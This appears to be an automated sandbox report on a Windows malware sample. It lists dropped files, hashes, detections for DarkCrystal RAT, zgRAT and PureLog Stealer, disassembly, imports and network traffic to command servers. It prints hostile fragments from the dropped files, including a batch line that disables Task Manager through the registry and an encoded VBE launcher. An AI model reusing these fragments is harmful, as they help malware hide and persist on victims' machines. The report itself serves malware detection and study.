                                                                                                                  SHA-512:0E4C741BA7FD0E99E504606000E2190B6C9AFCB4349F80C6610DA2F974C8A466FD9C22DF000B65D46AF72C4970E826ED77533FE2307270A70A044B36AEB1814A
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....A.g.................l..........N.... ........@.. ....................................@.....................................K....... ............................................................................ ............... ..H............text...Tk... ...l.................. ..`.rsrc... ............n..............@....reloc...............r..............@..B................0.......H..............................s........................................0..........(.... ........8........E....).......8...9...8$...(.... ....~....{....:....& ....8....(.... ....8....*(.... ....~....{....:....& ....8........0.......... ........8........E....{...R...............8v...r...ps....z*....~....(R...~....(V... ....?.... ....~....{....:....& ....8....~....:.... ....~....{....9w...& ....8l......... ....~....{f...9R...& ....8G...~....(J... .... .... ....s....~....(N....
                                                                                                                  Process:C:\Users\user\Desktop\PbfYaIvR5B.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1930240
                                                                                                                  Entropy (8bit):7.544591098529135
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:3op1VaW6LOFlNM9TJozhpuCebFQQYJkvoAgNpjYsKyX0IS1/XF1vsnPVU82rRrcP:Y8WeJJUFAFQGoAgNCw0J1/XfkP/qcd
                                                                                                                  MD5:4F593957FF5A8313DC52738F85592CBA
                                                                                                                  SHA1:DC5E3E8F14B9C6E6541947E55B195B8EFEBF22D7
                                                                                                                  SHA-256:1D85033F5C6BC5927CB48364F91D455F2263DFF76505D9849E5E4958CB6C173F
                                                                                                                  SHA-512:0E4C741BA7FD0E99E504606000E2190B6C9AFCB4349F80C6610DA2F974C8A466FD9C22DF000B65D46AF72C4970E826ED77533FE2307270A70A044B36AEB1814A
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\webHostnet\MsPortSavesruntime.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\webHostnet\MsPortSavesruntime.exe, Author: Joe Security
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....A.g.................l..........N.... ........@.. ....................................@.....................................K....... ............................................................................ ............... ..H............text...Tk... ...l.................. ..`.rsrc... ............n..............@....reloc...............r..............@..B................0.......H..............................s........................................0..........(.... ........8........E....).......8...9...8$...(.... ....~....{....:....& ....8....(.... ....8....*(.... ....~....{....:....& ....8........0.......... ........8........E....{...R...............8v...r...ps....z*....~....(R...~....(V... ....?.... ....~....{....:....& ....8....~....:.... ....~....{....9w...& ....8l......... ....~....{f...9R...& ....8G...~....(J... .... .... ....s....~....(N....
                                                                                                                  Process:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  File Type:ASCII text, with very long lines (369), with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):369
                                                                                                                  Entropy (8bit):5.838092212107247
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:LAJqBMKzDp/9fr/rqnP0Lgclv0CJbCJH2dFB+e+4UsINwTxPf3246RuBgJyfc:CEp/wnP0MI0CxYNkxPf3h6Rc2F
                                                                                                                  MD5:50E7C17B10E2DFABA1A842B111FAD9EC
                                                                                                                  SHA1:E914A998004E559AB897C11243346C53BF30D500
                                                                                                                  SHA-256:2E95E530770CF5128B55D448DDA0B5558578B6FC6B14920FEE371272511D8021
                                                                                                                  SHA-512:8B03CBFE5E2AECC5CABE27000E877526910081F37C7513242A5BFFA48F6C53AC9D86B0A5F1F141033B71597352DD5E327260D1B4F95C31EF6C69A60FED9AF074
                                                                                                                  Malicious:false
                                                                                                                  Preview:2kn7bVEeLkbpnckle6qfbE00pR59rXPt4UAKY6NrPToxO9BFbz6LAV4xuwRKaFwxUsuSbZNis8PIZDmqPzi1bEtiaNamoDRJg1cfOtnBmXcBFwYrJk5kh5WQ9L2O9l3prGlikHcfLhPDmrdnytcDIqmlfMgC0ZBBdxU9L0GBIZY9pSnRsOZQI0gAd9CYlZpwfOjzXdc8ma4tSm6MiOUm9v2nQTgLxsattmebty4Pvbnr5xs0D0zXFDxuV6iD7RL4AL9pIedtTE0hHLrdlpI62DoqzuGxQ1ReQtruxCsiXGDAMPmJOFcRIOC6gS0YYqdcwWRYd7pi7jjv9oejH6jKYAVBquOeLTKrmlN07OpQZ3UipQ71y
                                                                                                                  Process:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):283
                                                                                                                  Entropy (8bit):5.761422712987861
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:zz3XnHNdan7rlCpXtNimzv6OZUPfEt8Bega/QoVyHB4PWep:zz3dWhCprPzvhZUPfg8BK/QosHwWep
                                                                                                                  MD5:56A4B7FF2DC8E765DE75B4D348E4AFD0
                                                                                                                  SHA1:B8CE24F2D5AF0AEB8E8A12B57CDC481302FF5DEB
                                                                                                                  SHA-256:5B321F38375201B8399FE9B5E9F42B0A8518FE542A6CAF17E7B9E9986030884E
                                                                                                                  SHA-512:295A631DE508ED53164FE5261A66C6D13841C45DE62F8D8CC15D9D2541161688F65ADCAE2F57675B767FDA278E8091D8BA2EACD6A1FA7A7D2794A0255D7AF48E
                                                                                                                  Malicious:false
                                                                                                                  Preview:Wg0Vru74YH2w4vu4VTSuDQ9NKOtMEyuxXUzssDroVZbV3o3XogvdtDNFhnLdAvzjWEZk6BMRmnYoynTfVWiiDRDTHtLE2Ookj29yOSamUe0GpjR3UpHoNRfFBFcM0HZX9xE5oeQC55Nia7nibSuMG9XRX3xJ0OwMFcH2eWO0YFtRE6pDb4vhWMR9awivqHMrJAd70vDFD4xAQFNaOur5cO02LHcsxdJR3CIDdrNq1pdcZQtUjIh6aQO4KlvtTVRkugHO7K7ghBExuYd4YHIp6N0nxN2
                                                                                                                  Process:C:\Users\user\Desktop\PbfYaIvR5B.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):197
                                                                                                                  Entropy (8bit):5.334619114551162
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:vXmStuH1jhRiI36BTD6ATuUk0VeOJA9uPWI:/gVjhR136qKtVnYuPWI
                                                                                                                  MD5:C68424D522237CF78AA4511E34E7ABDA
                                                                                                                  SHA1:0E6BD31AC5C94B2F7BAF9952E722181746327F20
                                                                                                                  SHA-256:52CA02FB677CF28F98813C29DBCE9D521A3257006DE1289538B313AC34CBAB58
                                                                                                                  SHA-512:5487E35A5F98D224311997E7906D999C0A496AFF5EC0A2C364566BEF64D16E2F79BEC2A06558363D337453B9DA5734DEAB157CA20868B02BFB22933C1F1E5791
                                                                                                                  Malicious:false
                                                                                                                  Preview:%WYkFFPZPPodb%reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f%DfmAEeOd%..%KYmOe%"C:\webHostnet/MsPortSavesruntime.exe"%XhsygUYjiVWTsMG%
                                                                                                                  Process:C:\Users\user\Desktop\PbfYaIvR5B.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):243
                                                                                                                  Entropy (8bit):5.909145146566472
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:GmgwqK+NkLzWbH7MrFnBaORbM5nCvdhHbNFZjiIDViO29:G0MCzWL7MhBaORbQCFhHbNvjfD729
                                                                                                                  MD5:C502F6060BF849E72AB58258F8B8BCF2
                                                                                                                  SHA1:728683A638D413AC1706BB139E6D3A8B54EF5431
                                                                                                                  SHA-256:485DFCFE33027D5023830E32AC17F0EBBC36048EFCC48DB58FE10FE1D4CC341E
                                                                                                                  SHA-512:EA6563D1338E382E6109DF8F16E0F67A6355AC766786F86D2FA011BDB274DA2ED7DAFCA508FB6CADE0E6725D6BDA37166CDFF4805DEF1BCB1C82BF0E9A9BB63E
                                                                                                                  Malicious:false
                                                                                                                  Preview:#@~^2gAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vF1!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=zA.4_W/Dx.OzJwF1q!JJh\hkfMSp|}VGm4qo.F.*fNvT2mh&D dq"xb/*$j(2Wuts/mR(lYr~,T~,0CVk+WkQAAA==^#~@.
                                                                                                                  Process:C:\Windows\System32\PING.EXE
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):502
                                                                                                                  Entropy (8bit):4.622641701177187
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:PBww5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:ZjdUOAokItULVDv
                                                                                                                  MD5:95DE98EBB67D8DD95E3C1F4DC8C32D14
                                                                                                                  SHA1:94351D1885BC56489E5AB6A958EEF0A568C3A516
                                                                                                                  SHA-256:BB26C29FA30A2D765897BE02A2D17B00FC599E34BF5E8EDBC66774F31C9B2EF0
                                                                                                                  SHA-512:CEAC1EB7F61B085A25C74F8B71AE00BE0FA472DFB7EDB750DCDBD17336F3161E2D47BA82EC0B80A0C2687AF6EAF7093B5CC5253CBE414B8494C9875E54D43DD6
                                                                                                                  Malicious:false
                                                                                                                  Preview:..Pinging 364339 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Entropy (8bit):7.320441410879036
                                                                                                                  TrID:
                                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                  File name:PbfYaIvR5B.exe
                                                                                                                  File size:2'319'208 bytes
                                                                                                                  MD5:7471eb468a1f0166167f369bec578915
                                                                                                                  SHA1:9ded35e930d112a8909dad6aaf1a657f65284588
                                                                                                                  SHA256:9e52adafb9ddb7668e8c025ebd74a856434b0c4c487a6204fe750e683bc3dbe4
                                                                                                                  SHA512:3f4abc590644d80a6fdebca9e0d2e1a28bbe220a2f48affa09707d9eaa0ab08077dfec58d6f3b78483459dd143cabd1c38ce3941f5766f06e0f1649b705078f8
                                                                                                                  SSDEEP:49152:IBTj8WeJJUFAFQGoAgNCw0J1/XfkP/qcdi:yf8W7W8AtX83qcdi
                                                                                                                  TLSH:3CB5AE0659924E37C26056318457D53D92A4DE722DA1EB0B3BDF2CA7B8137F0CA732A7
                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.
                                                                                                                  Icon Hash:3301136d6d826921
                                                                                                                  Entrypoint:0x41f530
                                                                                                                  Entrypoint Section:.text
                                                                                                                  Digitally signed:false
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                  Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:5
                                                                                                                  OS Version Minor:1
                                                                                                                  File Version Major:5
                                                                                                                  File Version Minor:1
                                                                                                                  Subsystem Version Major:5
                                                                                                                  Subsystem Version Minor:1
                                                                                                                  Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                                                                                                  Instruction
                                                                                                                  call 00007F2FB083936Bh
                                                                                                                  jmp 00007F2FB0838C7Dh
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  push esi
                                                                                                                  push dword ptr [ebp+08h]
                                                                                                                  mov esi, ecx
                                                                                                                  call 00007F2FB082BAC7h
                                                                                                                  mov dword ptr [esi], 004356D0h
                                                                                                                  mov eax, esi
                                                                                                                  pop esi
                                                                                                                  pop ebp
                                                                                                                  retn 0004h
                                                                                                                  and dword ptr [ecx+04h], 00000000h
                                                                                                                  mov eax, ecx
                                                                                                                  and dword ptr [ecx+08h], 00000000h
                                                                                                                  mov dword ptr [ecx+04h], 004356D8h
                                                                                                                  mov dword ptr [ecx], 004356D0h
                                                                                                                  ret
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  push esi
                                                                                                                  mov esi, ecx
                                                                                                                  lea eax, dword ptr [esi+04h]
                                                                                                                  mov dword ptr [esi], 004356B8h
                                                                                                                  push eax
                                                                                                                  call 00007F2FB083C10Fh
                                                                                                                  test byte ptr [ebp+08h], 00000001h
                                                                                                                  pop ecx
                                                                                                                  je 00007F2FB0838E0Ch
                                                                                                                  push 0000000Ch
                                                                                                                  push esi
                                                                                                                  call 00007F2FB08383C9h
                                                                                                                  pop ecx
                                                                                                                  pop ecx
                                                                                                                  mov eax, esi
                                                                                                                  pop esi
                                                                                                                  pop ebp
                                                                                                                  retn 0004h
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  sub esp, 0Ch
                                                                                                                  lea ecx, dword ptr [ebp-0Ch]
                                                                                                                  call 00007F2FB082BA42h
                                                                                                                  push 0043BEF0h
                                                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                                                  push eax
                                                                                                                  call 00007F2FB083BBC9h
                                                                                                                  int3
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  sub esp, 0Ch
                                                                                                                  lea ecx, dword ptr [ebp-0Ch]
                                                                                                                  call 00007F2FB0838D88h
                                                                                                                  push 0043C0F4h
                                                                                                                  lea eax, dword ptr [ebp-0Ch]
                                                                                                                  push eax
                                                                                                                  call 00007F2FB083BBACh
                                                                                                                  int3
                                                                                                                  jmp 00007F2FB083D647h
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  push 00422900h
                                                                                                                  push dword ptr fs:[00000000h]
                                                                                                                  Programming Language:
                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000x1e4dc.rsrc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x830000x233c.reloc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                  .text0x10000x31bdc0x31c002831bb8b11e3209658a53131886cdf98False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                  .rdata0x330000xaec00xb000042f11346230ca5aa360727d9908e809False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .data0x3e0000x247200x10009670b581969e508258d8bc903025de5eFalse0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .didat0x630000x1900x200c83554035c63bb446c6208d0c8fa0256False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .rsrc0x640000x1e4dc0x1e600e4ef30da99097319db5dbe5e18382adfFalse0.18658371913580246data2.4755358130803757IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .reloc0x830000x233c0x240040b5e17755fd6fdd34de06e5cdb7f711False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                  PNG0x646140xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                                                                                  PNG0x6515c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                                                                                  RT_ICON0x667080x1537PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9802982876081753
                                                                                                                  RT_ICON0x67c400x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/m0.04127232935052644
                                                                                                                  RT_ICON0x784680x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 3779 x 3779 px/m0.07463391591875296
                                                                                                                  RT_ICON0x7c6900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m0.10010373443983403
                                                                                                                  RT_ICON0x7ec380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m0.1346153846153846
                                                                                                                  RT_ICON0x7fce00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/m0.24911347517730498
                                                                                                                  RT_DIALOG0x801480x286dataEnglishUnited States0.5092879256965944
                                                                                                                  RT_DIALOG0x803d00x13adataEnglishUnited States0.60828025477707
                                                                                                                  RT_DIALOG0x8050c0xecdataEnglishUnited States0.6991525423728814
                                                                                                                  RT_DIALOG0x805f80x12edataEnglishUnited States0.5927152317880795
                                                                                                                  RT_DIALOG0x807280x338dataEnglishUnited States0.45145631067961167
                                                                                                                  RT_DIALOG0x80a600x252dataEnglishUnited States0.5757575757575758
                                                                                                                  RT_STRING0x80cb40x1e2dataEnglishUnited States0.3900414937759336
                                                                                                                  RT_STRING0x80e980x1ccdataEnglishUnited States0.4282608695652174
                                                                                                                  RT_STRING0x810640x1b8dataEnglishUnited States0.45681818181818185
                                                                                                                  RT_STRING0x8121c0x146dataEnglishUnited States0.5153374233128835
                                                                                                                  RT_STRING0x813640x46cdataEnglishUnited States0.3454063604240283
                                                                                                                  RT_STRING0x817d00x166dataEnglishUnited States0.49162011173184356
                                                                                                                  RT_STRING0x819380x152dataEnglishUnited States0.5059171597633136
                                                                                                                  RT_STRING0x81a8c0x10adataEnglishUnited States0.49624060150375937
                                                                                                                  RT_STRING0x81b980xbcdataEnglishUnited States0.6329787234042553
                                                                                                                  RT_STRING0x81c540xd6dataEnglishUnited States0.5747663551401869
                                                                                                                  RT_GROUP_ICON0x81d2c0x5adata0.7666666666666667
                                                                                                                  RT_MANIFEST0x81d880x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333
                                                                                                                  DLLImport
                                                                                                                  KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                                                                                  OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                                                                                  gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                  EnglishUnited States
                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                  2024-10-27T19:22:28.144078+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44973734.117.59.81443TCP
                                                                                                                  2024-10-27T19:22:43.305353+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449739188.114.97.380TCP
                                                                                                                  2024-10-27T19:22:51.390049+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44975234.117.59.81443TCP
                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Oct 27, 2024 19:22:26.532354116 CET49736443192.168.2.434.117.59.81
                                                                                                                  Oct 27, 2024 19:22:26.532440901 CET4434973634.117.59.81192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:26.532526016 CET49736443192.168.2.434.117.59.81
                                                                                                                  Oct 27, 2024 19:22:26.545834064 CET49736443192.168.2.434.117.59.81
                                                                                                                  Oct 27, 2024 19:22:26.545880079 CET4434973634.117.59.81192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:27.168219090 CET4434973634.117.59.81192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:27.168328047 CET49736443192.168.2.434.117.59.81
                                                                                                                  Oct 27, 2024 19:22:27.173825026 CET49736443192.168.2.434.117.59.81
                                                                                                                  Oct 27, 2024 19:22:27.173877001 CET4434973634.117.59.81192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:27.174293041 CET4434973634.117.59.81192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:27.220621109 CET49736443192.168.2.434.117.59.81
                                                                                                                  Oct 27, 2024 19:22:27.263374090 CET4434973634.117.59.81192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:27.367572069 CET4434973634.117.59.81192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:27.369211912 CET4434973634.117.59.81192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:27.369334936 CET49736443192.168.2.434.117.59.81
                                                                                                                  Oct 27, 2024 19:22:27.373918056 CET49736443192.168.2.434.117.59.81
                                                                                                                  Oct 27, 2024 19:22:27.376933098 CET49737443192.168.2.434.117.59.81
                                                                                                                  Oct 27, 2024 19:22:27.376992941 CET4434973734.117.59.81192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:27.377234936 CET49737443192.168.2.434.117.59.81
                                                                                                                  Oct 27, 2024 19:22:27.377480984 CET49737443192.168.2.434.117.59.81
                                                                                                                  Oct 27, 2024 19:22:27.377497911 CET4434973734.117.59.81192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:27.992953062 CET4434973734.117.59.81192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:27.995203018 CET49737443192.168.2.434.117.59.81
                                                                                                                  Oct 27, 2024 19:22:27.995242119 CET4434973734.117.59.81192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:28.144088984 CET4434973734.117.59.81192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:28.145761967 CET4434973734.117.59.81192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:28.145876884 CET49737443192.168.2.434.117.59.81
                                                                                                                  Oct 27, 2024 19:22:28.146229029 CET49737443192.168.2.434.117.59.81
                                                                                                                  Oct 27, 2024 19:22:28.313775063 CET49738443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:28.313842058 CET44349738149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:28.313924074 CET49738443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:28.317498922 CET49738443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:28.317542076 CET44349738149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:29.185322046 CET44349738149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:29.185400963 CET49738443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:29.189332962 CET49738443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:29.189363956 CET44349738149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:29.189814091 CET44349738149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:29.191787004 CET49738443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:29.239331007 CET44349738149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:29.456193924 CET44349738149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:29.467344046 CET49738443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:29.467371941 CET44349738149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:29.469005108 CET49738443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:29.469017029 CET44349738149.154.167.220192.168.2.4
                                                                                                                  Oct 27, 2024 19:22:29.469187975 CET49738443192.168.2.4149.154.167.220
                                                                                                                  Oct 27, 2024 19:22:29.469193935 CET44349738149.154.167.220192.168.2.4
